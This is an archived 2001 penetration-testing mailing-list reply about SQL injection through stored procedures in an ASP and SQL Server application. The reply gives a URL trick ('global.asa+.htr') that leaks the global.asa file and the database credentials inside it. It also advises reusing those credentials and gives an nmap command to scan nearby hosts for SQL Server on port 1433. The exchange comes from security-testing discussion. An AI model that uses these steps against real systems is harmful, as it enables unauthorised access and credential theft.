Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

Re: [PEN-TEST] sql injection with stored procedures

From: Ted Behling <TBehling () MONARCHIS NET>
Date: Thu, 15 Mar 2001 15:30:26 -0500
Try grabbing the global.asa file, with something like:

http://servername.com/global.asa+.htr

Lots of poorly-secured WinNT boxes still haven't applied this patch.
You'll have to View Source in your browser to look at the file.  If this
succeeds, you'll probably have the username/password for the ODBC DSN used
to hit the SQL Server.  Given that, just make a new DSN on your own
computer to access their Web server's SQL Server using TCP/IP.  If the
service isn't running on the same box, use nmap to scan the Web server's
neighbors for machines that have a SQL Server running on port 1433, with
something like:

nmap -sT -p 1433 1.2.3.0/24

where 1.2.3 are the first three bytes of the IP address.

At 12:13 PM 3/15/01 -0300, Cristiano Lincoln Mattos wrote:

      I'm working on a pen-test for a client -- basically, im in
a situation where his web app (ASP+SQLServer) does not validate the form
inputs,
making sql injection possible.  What's making this trickier is
that the form inputs are parameters to stored procedures that
the app uses... and the SELECT calls are inside those procedures.

      So, i can inject statements into the stored proc call, but
not into the select calls inside it, as using 's and the like is
not "carried" in to the procedure.  An example:



------------------------------------------------
Ted Behling, E-Commerce Consultant
Monarch Information Systems, Inc.
"Because Every Business Should Be An E-Business"

43 Folly Field Road, Unit 4
Hilton Head Island, SC 29928-5434
Toll-free Phone & Fax: 1-800-842-7894
Local or Outside the USA: 1-843-842-7894
mailto:tbehling () monarchis net
http://www.monarchis.net
------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: